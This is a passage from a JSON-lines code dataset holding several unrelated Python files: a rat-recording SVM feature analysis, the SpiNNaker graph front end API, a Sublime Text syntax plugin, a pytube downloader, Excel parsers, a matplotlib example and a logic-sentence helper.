colors\r\n\r\n\r\ndef find_polar_r(dataframe):\r\n    \"\"\"\r\n    Transform into polar, find r.\r\n\r\n    Parameters\r\n    ----------\r\n    dataframe : pandas.dataframe\r\n        Dataframe of 1 rat.\r\n\r\n    Returns\r\n    -------\r\n    dataframe : pandas.dataframe\r\n        the same dataframe with the calculated r values appended.\r\n\r\n    \"\"\"\r\n    dataframe['r'] = dataframe.apply(lambda x: math.hypot(x.u,x.v), axis=1)\r\n    return dataframe\r\n\r\n\r\ndef find_polar_phi(dataframe):\r\n    \"\"\"\r\n    Transform into polar, find angle.\r\n\r\n    Parameters\r\n    ----------\r\n    dataframe : pandas.dataframe\r\n        Dataframe of 1 rat.\r\n\r\n    Returns\r\n    -------\r\n    dataframe : pandas.dataframe\r\n        the same dataframe with the calculated angle values appended.\r\n\r\n    \"\"\"\r\n    dataframe['phi'] = dataframe.apply(lambda x: math.atan2(x.v, x.u), axis=1) # !!! 
v and u in unusual order\r\n    return dataframe\r\n\r\n\r\ndef load_optimal_values():\r\n    \"\"\"\r\n    Load the optimal values found for each recording.\r\n    Open dialog window and select the files.\r\n\r\n    Returns\r\n    -------\r\n    Files_Dict : Dictionary\r\n        Dictionary assigning the optimal values to the recordings.\r\n\r\n    \"\"\"\r\n    temp = askopenfilenames()\r\n    file_names = list(temp)\r\n    Files_Dict = {42: {0: {}, 1: {}, 2: {}},\r\n                  52: {0: {}, 1: {}, 2: {}},\r\n                  74: {0: {}, 1: {}, 2: {}, 3: {}},\r\n                  146: {0: {}, 1: {}, 2: {}, 3: {}}}\r\n    for filename in tqdm(file_names):\r\n        ID_rat = re.search(r\"id_(\\d+)_\", filename).group(1)\r\n        alt = re.search(r\"_alt_(\\d)\", filename).group(1)\r\n        with open(filename, \"rb\") as fin:\r\n            Files_Dict[int(ID_rat)][int(alt)] = pickle.load(fin)\r\n    return Files_Dict\r\n\r\n\r\ndef aux_bin_middle(bin_edges):\r\n    \"\"\"\r\n    Find the center points of the bins.\r\n    Auxiliary function.\r\n\r\n    Parameters\r\n    ----------\r\n    bin_edges : array of dtype float\r\n        array specifying the edges.\r\n\r\n    Returns\r\n    -------\r\n    bin_centers : numpy.array\r\n        array of bin centers.\r\n\r\n    \"\"\"\r\n    bin_centers = []\r\n    for i in range(len(bin_edges) - 1):\r\n        center = bin_edges[i] + (float(bin_edges[i + 1]) - float(bin_edges[i]))/2.\r\n        bin_centers.append(center)\r\n    return np.array(bin_centers)\r\n\r\n\r\ndef evaluate_stats(df_rat, kresli=False):\r\n    \"\"\"\r\n    Create the features for ML algorithm.\r\n\r\n    Parameters\r\n    ----------\r\n    df_rat : pandas.dataframe\r\n        Dataframe of 1 recording.\r\n    kresli : boolean, optional\r\n        Whether the polar transform should be plotted. The default is False.\r\n\r\n    Returns\r\n    -------\r\n    phi_vertex : float\r\n        Attractor rotation.\r\n    r_circumscribed : float\r\n        Attractor size circumscribed.\r\n    vertex_width : float\r\n        Width in vertex.\r\n    vertex_count : integer\r\n        Count in vertex.\r\n    phi_edge : float\r\n        Attractor rotation defined by the edge.\r\n    r_inscribed : float\r\n        Attractor size inscribed.\r\n    edge_width : float\r\n        Width in edge.\r\n    edge_count : integer\r\n        Count in edge.\r\n\r\n    \"\"\"\r\n    bin_mean, bin_edges, binnumber = stats.binned_statistic(x=df_rat.phi, values=df_rat.r, bins=100, statistic='mean')\r\n    bin_std, bin_edges, binnumber = stats.binned_statistic(x=df_rat.phi, values=df_rat.r, bins=100, statistic='std')\r\n    bin_hist, bin_edges, binnumber = stats.binned_statistic(x=df_rat.phi, values=df_rat.r, bins=100, statistic='count')\r\n\r\n    if kresli:\r\n        f1 = sns.jointplot(data=df_rat, x=\"phi\", y=\"r\", color='#85C0F9')\r\n        f1.ax_joint.hlines(bin_mean, bin_edges[:-1], bin_edges[1:], colors='#A95AA1', lw=2, label='binned statistic of data')\r\n        f1.ax_joint.vlines(aux_bin_middle(bin_edges), bin_mean - bin_std, bin_mean + bin_std, colors='#0F2080')\r\n        plt.figure()\r\n        plt.axes(projection='polar')\r\n        plt.polar(df_rat.phi, df_rat.r)\r\n\r\n    bin_mids = aux_bin_middle(bin_edges)\r\n\r\n    mask_limit = ((bin_mids < 0) & (bin_mids > -2)) # To make sure that we find the first extreme value\r\n    max_index = bin_mean[mask_limit].argmax()\r\n    phi_vertex = bin_mids[mask_limit][max_index]\r\n    r_circumscribed = bin_mean[mask_limit][max_index]\r\n    vertex_width = bin_std[mask_limit][max_index]\r\n    vertex_count = bin_hist[mask_limit][max_index]\r\n\r\n    mask_limit_moved = ((bin_mids < phi_vertex + 2/3*math.pi) & (bin_mids > phi_vertex))\r\n    min_index = bin_mean[mask_limit_moved].argmin()\r\n    phi_edge = bin_mids[mask_limit_moved][min_index]\r\n    r_inscribed = bin_mean[mask_limit_moved][min_index]\r\n    edge_width = 
bin_std[mask_limit_moved][min_index]\r\n    edge_count = bin_hist[mask_limit_moved][min_index]\r\n\r\n    return phi_vertex, r_circumscribed, vertex_width, vertex_count, phi_edge, r_inscribed, edge_width, edge_count\r\n\r\n\r\nX_dict = {42: {0: {}, 1: {}, 2: {}},\r\n          52: {0: {}, 1: {}, 2: {}},\r\n          74: {0: {}, 1: {}, 2: {}, 3: {}},\r\n          146: {0: {}, 1: {}, 2: {}, 3: {}}}\r\n\r\noptimal_values = load_optimal_values()\r\n\r\n\r\n###############################################################################\r\n# Here we load the files prepared in method3_prepare_dataset.py and do the transformations.\r\n# Some loading functions need to be imported from method3_find_optimal.\r\n# Data are then transformed into polar by functions defined above.\r\n# This takes several minutes, so we saved the results after the first time.\r\n# We commented the block and each time only load the already transformed data from file 'prepared_dict_5min'.\r\n###############################################################################\r\n\r\n# =============================================================================\r\n# from method3_find_optimal import *\r\n# dict_rats = load_dict_dialog()\r\n#\r\n#\r\n# for ID_rat,v in dict_rats.items():\r\n#     for alt,u in tqdm(v.items()):\r\n#         for hour,w in u.items():\r\n#             X_dict[ID_rat][alt][hour] = create_new_variables(w, [t[1] for t in optimal_values[ID_rat][alt] if t[0]==hour][0])\r\n#             X_dict[ID_rat][alt][hour] = find_polar_r(X_dict[ID_rat][alt][hour])\r\n#             X_dict[ID_rat][alt][hour] = find_polar_phi(X_dict[ID_rat][alt][hour])\r\n# =============================================================================\r\n\r\n# =============================================================================\r\n# with open('prepared_dict_5min', \"wb\") as fin:\r\n#     pickle.dump(X_dict, fin)\r\n# =============================================================================\r\n\r\nwith open('C:/Users/ide23/Documents/Diplo/prepared_dict_5min', \"rb\") as fin:\r\n    X_dict = pickle.load(fin)\r\n\r\n\r\nid_strain_map = {\r\n    42:'HanSD',\r\n    52:'TGR',\r\n    74:'SHR',\r\n    146:'WT'\r\n    }\r\n\r\nX_df = pd.DataFrame(columns=['ID_rat', 'alt', 'hour', 'phi_vertex',\r\n                             'r_circumscribed', 'vertex_width',\r\n                             'vertex_edge_count_ration', 'phi_edge',\r\n                             'r_inscribed', 'edge_width', 'tau'])\r\nfor ID_rat, v in X_dict.items():\r\n    for alt, u in tqdm(v.items()):\r\n        for hour, w in u.items():\r\n            stat = list(evaluate_stats(w))\r\n            novy_riadok = {\r\n                'ID_rat': int(ID_rat),\r\n                'alt': int(alt),\r\n                'hour': int(hour),\r\n                'phi_vertex': stat[0],\r\n                'r_circumscribed': stat[1],\r\n                'vertex_width': stat[2],\r\n                'vertex_edge_count_ration': stat[3]/stat[7],\r\n                'phi_edge': stat[4],\r\n                'r_inscribed': stat[5],\r\n                'edge_width': stat[6],\r\n                'tau': [t[1] for t in optimal_values[ID_rat][alt] if t[0] == hour][0]\r\n            }\r\n            X_df = X_df.append(novy_riadok, ignore_index=True)\r\n\r\n\r\nX_df['strain'] = X_df['ID_rat'].map(id_strain_map)\r\n\r\nX = X_df[['phi_vertex', 'r_circumscribed', 'vertex_width',\r\n          'vertex_edge_count_ration', 'phi_edge',\r\n          'r_inscribed', 'edge_width', 'tau']].to_numpy()\r\ny = np.ravel(X_df[['strain']].to_numpy())\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X, y,\r\n                                                    test_size=0.3,\r\n                                                    random_state=42)\r\n\r\nscaler = StandardScaler()\r\nscaler.fit(X_train)\r\nX_train = scaler.transform(X_train)\r\nX_test = scaler.transform(X_test)\r\n\r\n\r\nparam_grid = {\r\n    'C': [2**(2*i-1) for i in range(-2, 9)],\r\n    'kernel': ['linear']\r\n    }\r\n\r\nclf = GridSearchCV(SVC(),\r\n                   param_grid,\r\n                   
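# note: with single-label multiclass targets like these strain classes,\r\n                   # micro-averaged F1 is equivalent to plain accuracy, since every\r\n                   # false positive for one class is a false negative for another\r\n                   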
scoring='f1_micro',\r\n n_jobs = -1)\r\nclf.fit(X_train, y_train)\r\nprint(\"Best parameter (CV score=%0.3f):\" % clf.best_score_)\r\nprint(clf.best_params_)\r\n\r\nclf.best_estimator_.predict(X_train)\r\npred = clf.best_estimator_.predict(X_test)\r\n\r\nprint(confusion_matrix(y_test, pred))\r\nprint(classification_report(y_test, pred))\r\n\r\n\r\ndef f_importances(coef, names):\r\n \"\"\"\r\n Evaluate feature importance of features with linear kernel.\r\n\r\n Parameters\r\n ----------\r\n coef : list\r\n List of coef. values.\r\n names : list\r\n List of coef. names.\r\n\r\n Returns\r\n -------\r\n None.\r\n\r\n \"\"\"\r\n imp = coef\r\n imp, names = zip(*sorted(zip(imp, names)))\r\n plt.barh(range(len(names)), imp, align='center')\r\n plt.yticks(range(len(names)), names)\r\n plt.show()\r\n\r\n\r\nfeatures_names = ['phi_vertex', 'r_circumscribed', 'vertex_width',\r\n 'vertex_edge_count_ration', 'phi_edge',\r\n 'r_inscribed', 'edge_width', 'tau']\r\nf_importances(clf.best_estimator_.coef_[0], features_names)\r\n\r\n\r\ndef vykresli_animaciu(dict_potkan, optimal_values):\r\n from method3_find_optimal import create_histograms\r\n from matplotlib import animation\r\n fig = plt.figure(figsize=[20, 10], frameon=False)\r\n\r\n cmap = colors.LinearSegmentedColormap.from_list(\"\", [\"#d5f2f5\", \"#002e47\", \"#eb6d19\"])\r\n\r\n ax1 = fig.add_subplot(2, 2, 1)\r\n ax2 = fig.add_subplot(2, 2, 2)\r\n ax3 = fig.add_subplot(2, 2, 3)\r\n ax4 = fig.add_subplot(2, 2, 4)\r\n\r\n ims = []\r\n for hour in range(0, 24):\r\n H1 = create_histograms(dict_potkan[42][0][str(hour)])[0]\r\n H2 = create_histograms(dict_potkan[52][0][str(hour)])[0]\r\n H3 = create_histograms(dict_potkan[74][0][str(hour)])[0]\r\n H4 = create_histograms(dict_potkan[146][0][str(hour)])[0]\r\n\r\n im1 = ax1.imshow(np.sqrt(H1), cmap=cmap,\r\n extent=[-H1.shape[1]/2., H1.shape[1]/2., -H1.shape[0]/2., H1.shape[0]/2.],\r\n animated=True,)\r\n im2 = ax2.imshow(np.sqrt(H2), cmap=cmap,\r\n extent=[-H1.shape[1]/2., H1.shape[1]/2., -H1.shape[0]/2., H1.shape[0]/2.],\r\n animated=True)\r\n im3 = ax3.imshow(np.sqrt(H3), cmap=cmap,\r\n extent=[-H1.shape[1]/2., H1.shape[1]/2., -H1.shape[0]/2., H1.shape[0]/2.],\r\n animated=True)\r\n im4 = ax4.imshow(np.sqrt(H4), cmap=cmap,\r\n extent=[-H1.shape[1]/2., H1.shape[1]/2., -H1.shape[0]/2., H1.shape[0]/2.],\r\n animated=True)\r\n\r\n cas1 = ax1.text(0.5, 0.90, 'hour: ' + str(hour), ha=\"center\", va=\"bottom\",\r\n fontsize=\"large\", transform = ax1.transAxes)\r\n\r\n tau1 = ax1.text(0.5, 0.10, 'Tau: ' + str([t[1] for t in optimal_values[42][0] if t[0] == str(hour)][0]),\r\n ha=\"center\", va=\"bottom\", fontsize=\"large\", transform=ax1.transAxes)\r\n\r\n cas2 = ax2.text(0.5, 0.90, 'hour: ' + str(hour), ha=\"center\", va=\"bottom\",\r\n fontsize=\"large\", transform=ax2.transAxes)\r\n\r\n tau2 = ax2.text(0.5, 0.10, 'Tau: ' + str([t[1] for t in optimal_values[52][0] if t[0] == str(hour)][0]),\r\n ha=\"center\", va=\"bottom\", fontsize=\"large\", transform=ax2.transAxes)\r\n\r\n cas3 = ax3.text(0.5, 0.90, 'hour: ' + str(hour), ha=\"center\", va=\"bottom\",\r\n fontsize=\"large\", transform=ax3.transAxes)\r\n\r\n tau3 = ax3.text(0.5, 0.10, 'Tau: ' + str([t[1] for t in optimal_values[74][0] if t[0] == str(hour)][0]),\r\n ha=\"center\", va=\"bottom\", fontsize=\"large\", transform=ax3.transAxes)\r\n\r\n cas4 = ax4.text(0.5, 0.90, 'hour: ' + str(hour), ha=\"center\", va=\"bottom\",\r\n fontsize=\"large\", transform=ax4.transAxes)\r\n\r\n tau4 = ax4.text(0.5, 0.10, 'Tau: ' + str([t[1] for t in 
optimal_values[146][0] if t[0] == str(hour)][0]),\r\n                        ha=\"center\", va=\"bottom\", fontsize=\"large\", transform=ax4.transAxes)\r\n        ims.append([im1, im2, im3, im4, cas1, tau1, cas2, tau2, cas3, tau3, cas4, tau4])\r\n    ani = animation.ArtistAnimation(fig, ims, interval=5000, blit=True,\r\n                                    repeat_delay=100)\r\n\r\n\r\n    writergif = animation.PillowWriter(fps=2)\r\n    ani.save(\"trojuholnik_porovnanie_upgrade_vsetky.gif\",\r\n             writer=writergif, dpi = 300)","sub_path":"method3_analysis.py","file_name":"method3_analysis.py","file_ext":"py","file_size_in_byte":13471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"268653236","text":"# front end common imports\nfrom spinn_front_end_common.utilities.notification_protocol.socket_address \\\n    import SocketAddress\nfrom spinn_front_end_common.utilities.utility_objs.executable_finder \\\n    import ExecutableFinder\n\n# graph front end imports\nfrom spinnaker_graph_front_end._version import \\\n    __version__, __version_name__, __version_month__, __version_year__\nfrom spinnaker_graph_front_end.spinnaker import SpiNNaker\n\n# utility models for graph front ends\nfrom spinn_front_end_common.utility_models.live_packet_gather \\\n    import LivePacketGather  # @IgnorePep8\nfrom spinn_front_end_common.utility_models.reverse_ip_tag_multi_cast_source \\\n    import ReverseIpTagMultiCastSource  # @IgnorePep8\nfrom pacman.model.graphs.machine.impl.machine_edge \\\n    import MachineEdge  # @IgnorePep8\n\n\nimport logging\nimport inspect\nimport sys\nlogger = logging.getLogger(__name__)\n\n\n_spinnaker = None\n_none_labelled_vertex_count = None\n_none_labelled_edge_count = None\n\n\ndef setup(hostname=None, graph_label=None, model_binary_module=None,\n          model_binary_folder=None, database_socket_addresses=None,\n          user_dsg_algorithm=None, n_chips_required=None,\n          extra_pre_run_algorithms=None, extra_post_run_algorithms=None,\n          time_scale_factor=None, machine_time_step=None):\n    \"\"\"\n\n    :param hostname:\\\n        the hostname of the SpiNNaker machine to operate on\\\n        (overrides the machine_name from the cfg file).\n    :type hostname: str\n    :param graph_label:\\\n        a human readable label for the graph (used mainly in reports)\n    :type graph_label: str\n    :param model_binary_module:\\\n        the module where the binary files can be found for the c code that is \\\n        being used in this application; mutually exclusive with the \\\n        model_binary_folder.\n    :type model_binary_module: python module\n    :param model_binary_folder:\\\n        the folder where the binary files can be found for the c code that is\\\n        being used in this application; mutually exclusive with the\\\n        model_binary_module.\n    :type model_binary_folder: str\n    :param database_socket_addresses:\\\n        set of SocketAddresses that need to be added for the database\\\n        notification functionality. These are over and above the ones used by\\\n        the LiveEventConnection\n    :type database_socket_addresses: list of SocketAddresses\n    :param user_dsg_algorithm:\\\n        an algorithm used for generating the application data which is loaded\\\n        onto the machine. 
If not set, this will use the data specification language\\\n        algorithm required for the type of graph being used.\n    :type user_dsg_algorithm: str\n    :param n_chips_required:\\\n        if you need to be allocated a machine (for spalloc) before building\\\n        your graph, then fill this in with a general idea of the number of\\\n        chips you need so that the spalloc system can allocate you a machine\\\n        big enough for your needs.\n    :type n_chips_required: int\n    :param extra_pre_run_algorithms:\\\n        algorithms which need to be run after mapping and loading have occurred\\\n        but before the system has run. These are plugged directly into the\\\n        work flow management.\n    :type extra_pre_run_algorithms: list of str\n    :param extra_post_run_algorithms:\\\n        algorithms which need to be run after the simulation has run. These\\\n        could be post processing of generated data on the machine, for example.\n    :type extra_post_run_algorithms: list of str\n    \"\"\"\n    from spinnaker_graph_front_end import spinnaker\n    import os\n    global _spinnaker\n    global _none_labelled_vertex_count\n    global _none_labelled_edge_count\n\n    logger.info(\n        \"SpiNNaker graph front end (c) {}, \"\n        \"University of Manchester\".format(__version_year__))\n    parent_dir = os.path.split(os.path.split(\n        spinnaker.__file__)[0])[0]\n    logger.info(\n        \"Release version {}({}) - {} {}. Installed in folder {}\".format(\n            __version__, __version_name__, __version_month__, __version_year__,\n            parent_dir))\n\n    # add the directories where the binaries are located\n    executable_finder = ExecutableFinder()\n    if model_binary_module is not None:\n        executable_finder.add_path(\n            os.path.dirname(model_binary_module.__file__))\n    elif model_binary_folder is not None:\n        executable_finder.add_path(model_binary_folder)\n    else:\n        file_dir = os.path.dirname(os.path.abspath(sys.argv[0]))\n        executable_finder.add_path(file_dir)\n\n    # set up the spinnaker object\n    _spinnaker = SpiNNaker(\n        host_name=hostname, graph_label=graph_label,\n        executable_finder=executable_finder,\n        database_socket_addresses=database_socket_addresses,\n        dsg_algorithm=user_dsg_algorithm,\n        n_chips_required=n_chips_required,\n        extra_pre_run_algorithms=extra_pre_run_algorithms,\n        extra_post_run_algorithms=extra_post_run_algorithms,\n        machine_time_step=machine_time_step,\n        time_scale_factor=time_scale_factor)\n\n\ndef run(duration=None):\n    \"\"\" Method to support running an application for a number of microseconds\n\n    :param duration: the number of microseconds the application should run for\n    :type duration: int\n    \"\"\"\n    global _spinnaker\n\n    _spinnaker.run(duration)\n\n\ndef stop():\n    \"\"\" Do any necessary cleaning up before exiting. 
Unregisters the controller\n    \"\"\"\n    global _spinnaker\n    global _executable_finder\n\n    _spinnaker.stop()\n    _spinnaker = None\n    _executable_finder = None\n\n\ndef read_xml_file(file_path):\n    \"\"\" Reads an XML file and translates it into an application graph and \\\n        machine graph (if required)\n\n    :param file_path: the file path in absolute form\n    :return: None\n    \"\"\"\n    global _spinnaker\n    logger.warn(\"This functionality is not yet supported\")\n    _spinnaker.read_xml_file(file_path)\n\n\ndef add_vertex(cellclass, cellparams, label=None, constraints=None):\n    \"\"\"\n\n    :param cellclass: the class object for creating the vertex\n    :param cellparams: the input params for the class object\n    :param constraints: any constraints to be applied to the vertex once built\n    :param label: the label for this vertex\n    :type cellclass: python object\n    :type cellparams: dictionary of name and value\n    :type constraints: list of AbstractConstraint\n    :type label: str\n    :return: the vertex instance object\n    \"\"\"\n    global _spinnaker\n\n    # correct label if needed\n    if label is None and 'label' not in cellparams:\n        label = \"Vertex {}\".format(_spinnaker.none_labelled_vertex_count)\n        _spinnaker.increment_none_labelled_vertex_count()\n        cellparams['label'] = label\n    elif 'label' in cellparams and cellparams['label'] is None:\n        label = \"Vertex {}\".format(_spinnaker.none_labelled_vertex_count)\n        _spinnaker.increment_none_labelled_vertex_count()\n        cellparams['label'] = label\n    elif label is not None:\n        cellparams['label'] = label\n\n    # add vertex\n    cellparams['constraints'] = constraints\n    vertex = cellclass(**cellparams)\n    _spinnaker.add_application_vertex(vertex)\n    return vertex\n\n\ndef add_vertex_instance(vertex_to_add):\n    \"\"\"\n    :param vertex_to_add: vertex instance to add to the graph\n    :type vertex_to_add: instance of AbstractPartitionableVertex\n    :return: None\n    \"\"\"\n    global _spinnaker\n    _spinnaker.add_application_vertex(vertex_to_add)\n\n\ndef add_machine_vertex(\n        cellclass, cellparams, label=None, constraints=None):\n    \"\"\"\n\n    :param cellclass: the class object for creating the vertex\n    :param cellparams: the input params for the class object\n    :param constraints: any constraints to be applied to the vertex once built\n    :param label: the label for this vertex\n    :type cellclass: python object\n    :type cellparams: dictionary of name and value\n    :type constraints: list of AbstractConstraint\n    :type label: str\n    :return: the vertex instance object\n    \"\"\"\n    global _spinnaker\n\n    # correct label if needed\n    if label is None and 'label' not in cellparams:\n        label = \"Vertex {}\".format(_spinnaker.none_labelled_vertex_count)\n        _spinnaker.increment_none_labelled_vertex_count()\n        cellparams['label'] = label\n    elif 'label' in cellparams and cellparams['label'] is None:\n        label = \"Vertex {}\".format(_spinnaker.none_labelled_vertex_count)\n        _spinnaker.increment_none_labelled_vertex_count()\n        cellparams['label'] = label\n    elif label is not None:\n        cellparams['label'] = label\n\n    # add vertex\n    cellparams['constraints'] = constraints\n    vertex = cellclass(**cellparams)\n    _spinnaker.add_machine_vertex(vertex)\n    return vertex\n\n\ndef add_machine_vertex_instance(vertex_to_add):\n    \"\"\"\n\n    :param vertex_to_add: the vertex to add to the partitioned graph\n    :return: None\n    \"\"\"\n    global _spinnaker\n    _spinnaker.add_machine_vertex(vertex_to_add)\n\n\ndef add_edge(cell_type, cellparams, semantic_label, label=None):\n    \"\"\"\n\n    :param cell_type:\n    :param cellparams:\n    :param semantic_label:\n    :param 
constraints:\n :param label:\n :return:\n \"\"\"\n global _spinnaker\n\n # correct label if needed\n if label is None and 'label' not in cellparams:\n label = \"Edge {}\".format(_spinnaker.none_labelled_edge_count)\n _spinnaker.increment_none_labelled_edge_count()\n cellparams['label'] = label\n elif 'label' in cellparams and cellparams['label'] is None:\n label = \"Edge {}\".format(_spinnaker.none_labelled_edge_count)\n _spinnaker.increment_none_labelled_edge_count()\n cellparams['label'] = label\n elif label is not None:\n cellparams['label'] = label\n\n # add edge\n edge = cell_type(**cellparams)\n _spinnaker.add_application_edge(edge, semantic_label)\n return edge\n\n\ndef add_application_edge_instance(edge, partition_id):\n \"\"\"\n\n :param edge:\n :param partition_id:\n :return:\n \"\"\"\n _spinnaker.add_application_edge(edge, partition_id)\n\n\ndef add_machine_edge_instance(edge, partition_id):\n \"\"\"\n\n :param edge:\n :param partition_id:\n :return:\n \"\"\"\n _spinnaker.add_machine_edge(edge, partition_id)\n\n\ndef add_machine_edge(cellclass, cellparams, semantic_label, label=None):\n \"\"\"\n\n :param cellclass:\n :param cellparams:\n :param semantic_label:\n :param label:\n :return:\n \"\"\"\n global _spinnaker\n\n # correct label if needed\n if label is None and 'label' not in cellparams:\n label = \"Edge {}\".format(_spinnaker.none_labelled_edge_count)\n _spinnaker.increment_none_labelled_edge_count()\n cellparams['label'] = label\n elif 'label' in cellparams and cellparams['label'] is None:\n label = \"Edge {}\".format(_spinnaker.none_labelled_edge_count)\n _spinnaker.increment_none_labelled_edge_count()\n cellparams['label'] = label\n elif label is not None:\n cellparams['label'] = label\n\n # add edge\n edge = cellclass(**cellparams)\n _spinnaker.add_machine_edge(edge, semantic_label)\n return edge\n\n\ndef add_socket_address(\n database_ack_port_num, database_notify_host, database_notify_port_num):\n \"\"\"\n adds a socket address for the notification protocol\n :param database_ack_port_num: port num to send acknowledgement to\n :param database_notify_host: host ip to send notification to\n :param database_notify_port_num: port that the external device will be\n notified on.\n \"\"\"\n global _spinnaker\n\n database_socket = SocketAddress(\n listen_port=database_ack_port_num,\n notify_host_name=database_notify_host,\n notify_port_no=database_notify_port_num)\n\n _spinnaker.add_socket_address(database_socket)\n\n\ndef get_txrx():\n \"\"\"\n returns the transceiver used by the tool chain\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.transceiver\n\n\ndef get_machine_dimensions():\n \"\"\"\n returns the x and y dimension of the machine\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.get_machine_dimensions()\n\n\ndef get_number_of_cores_on_machine():\n \"\"\"\n returns the number of cores on this machine\n :return:\n \"\"\"\n global _spinnaker\n this_machine = _spinnaker.machine\n cores, _ = this_machine.get_cores_and_link_count()\n return cores\n\n\ndef has_ran():\n \"\"\"\n\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.has_ran\n\n\ndef machine_time_step():\n \"\"\"\n\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.machine_time_step\n\n\ndef no_machine_time_steps():\n \"\"\"\n\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.no_machine_time_steps\n\n\ndef timescale_factor():\n \"\"\"\n\n :return:\n \"\"\"\n global _spinnaker\n return _spinnaker.time_scale_factor\n\n\ndef machine_graph():\n \"\"\"\n\n :return:\n 
\"\"\"\n    global _spinnaker\n    return _spinnaker.machine_graph\n\n\ndef application_graph():\n    \"\"\"\n\n    :return:\n    \"\"\"\n    global _spinnaker\n    return _spinnaker.application_graph\n\n\ndef routing_infos():\n    \"\"\"\n\n    :return:\n    \"\"\"\n    global _spinnaker\n    return _spinnaker.routing_infos\n\n\ndef placements():\n    \"\"\"\n\n    :return:\n    \"\"\"\n    global _spinnaker\n    return _spinnaker.placements\n\n\ndef transceiver():\n    \"\"\"\n\n    :return:\n    \"\"\"\n    global _spinnaker\n    return _spinnaker.transceiver\n\n\ndef graph_mapper():\n    \"\"\"\n\n    :return:\n    \"\"\"\n    global _spinnaker\n    return _spinnaker.graph_mapper\n\n\ndef buffer_manager():\n    \"\"\"\n    returns the buffer manager being used for loading/extracting buffers\n    :return:\n    \"\"\"\n    global _spinnaker\n    return _spinnaker.buffer_manager\n\n\ndef machine():\n    \"\"\"\n\n    :return:\n    \"\"\"\n    global _spinnaker\n    return _spinnaker.machine\n\n\ndef is_allocated_machine():\n    return SpiNNaker.is_allocated_machine\n","sub_path":"spinnaker_graph_front_end/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"434572596","text":"import sublime\nimport sublime_plugin\n\nclass Listener(sublime_plugin.EventListener):\n\n    def on_new( self, view ):\n        settings = sublime.load_settings(\"default_file_type.sublime-settings\")\n\n        if settings.get('use_current_syntax') and view:\n            syntax = view.settings().get('syntax')\n        else:\n            syntax = settings.get('default_new_syntax')\n\n        # sublime.error_message(\"%s\" % syntax)\n        view.set_syntax_file(syntax)","sub_path":"default_file_type.py","file_name":"default_file_type.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"3625842","text":"# import pytube\n#\n# video_link='https://www.youtube.com/watch?v=7IXJbCm6hEE'\n# yt=pytube.YouTube(video_link)\n# videos=yt.streams.all()\n# videos.download('C:\\Users\\Public\\Videos')\n#\n\n# from pytube import YouTube\n#\n# yt = YouTube('https://www.youtube.com/watch?v=aBO4GWEtVtc')\n#\n# print(yt.title)\n#\n# stream = yt.streams.first()\n#\n# stream.download()\n\nfrom pytube import YouTube\nimport os\n\n# ask for the link once and hand it straight to pytube\nyt = YouTube(input(\"Enter the video link: \"))\n\ntry:\n    videos = yt.streams.all()\n\n    s = 1\n    for v in videos:\n        print(str(s)+\". 
\"+str(v))\n        s += 1\n\n    n = int(input(\"Enter the number of the video: \"))\n    video = videos[n - 1]\n\n    # destination = input(\"Enter the destination: \")\n    des = os.path.dirname('C:\\\\Users\\\\Vitez Software LAB\\\\Downloads\\\\yt')\n    video.download(des)\n    print(\"The video has been successfully downloaded\")\n\nexcept Exception as e:\n    print('----------------------------',e)\n\n","sub_path":"you.py","file_name":"you.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"415956394","text":"import pandas as pd\nimport numpy as np\nimport xlrd\n\nfrom pandas import ExcelFile\n\ndef xlxs_to_matrix(filename):\n    df = pd.read_excel(filename)\n    matrix = df.as_matrix()\n    matrix = np.asarray(matrix)\n    for l in matrix:\n        l[0] -= 1\n        l[2] -= 1\n\n    return matrix\n\ndef file_to_info(filename):\n    names = [\"D_INITIAL\", \"C_INITIAL\", \"A_INITIAL\", \"DFH\", \"DFC\", \"C_ELAPSED_TIME\",\n             \"ADDITIONAL\", \"C_NOT_ALLOWED\", \"MORE_C_SLOTS\", \"PUBLIC_HOLIDAYS\",\n             \"A_NOT_ALLOWED\", \"MORE_A_SLOTS\"]\n    info = []\n\n    for i in range(12):\n        df = pd.read_excel(filename, sheet_name=names[i])\n        matrix = df.as_matrix()\n        matrix = np.asarray(matrix)\n        info.append(matrix)\n\n    return info\n\n","sub_path":"env/excel_parser.py","file_name":"excel_parser.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"382433667","text":"#-*- coding: utf-8 -*-\r\n# My twenty-third program\r\n# Working with charts and data visualization\r\n# importing the library\r\nimport matplotlib.pyplot as plt\r\n\r\nx = [1,3,5,7,9]\r\ny = [2,3,7,1,2]\r\n\r\n\r\ntitulo=\"Bar Chart - Compare\"\r\neixox= \"X Axis\"\r\neixoy = \"Y Axis\"\r\n\r\n# Labels\r\nplt.title(titulo)\r\nplt.xlabel(eixox)\r\nplt.ylabel(eixoy)\r\n\r\n# Set the data on the chart\r\nplt.plot(x,y,color=\"k\", linestyle=\"-\")\r\nplt.scatter(x,y, label = \"My points\", color=\"r\", marker=\".\", s=100)\r\n# show the legend\r\nplt.legend()\r\n# save the figure before plt.show(), which clears the current canvas\r\nplt.savefig(\"figura1.png\",dpi=300)\r\n# show the chart\r\nplt.show()\r\n","sub_path":"saveFig.py","file_name":"saveFig.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"635091364","text":"def removeOr(sentence):\n    \"\"\"\n    removes \" | \" from sentence and returns list of sentences \n    \"\"\"\n    sub_predicates = []\n    while \" | \" in sentence:\n        index_of_or = sentence.find(\" | \")\n        first_half = sentence[:index_of_or]\n        sub_predicates.append(first_half)\n        sentence = sentence.replace(first_half, \"\").replace(\" | \", \"\",1).strip()\n    sub_predicates.append(sentence)\n    return 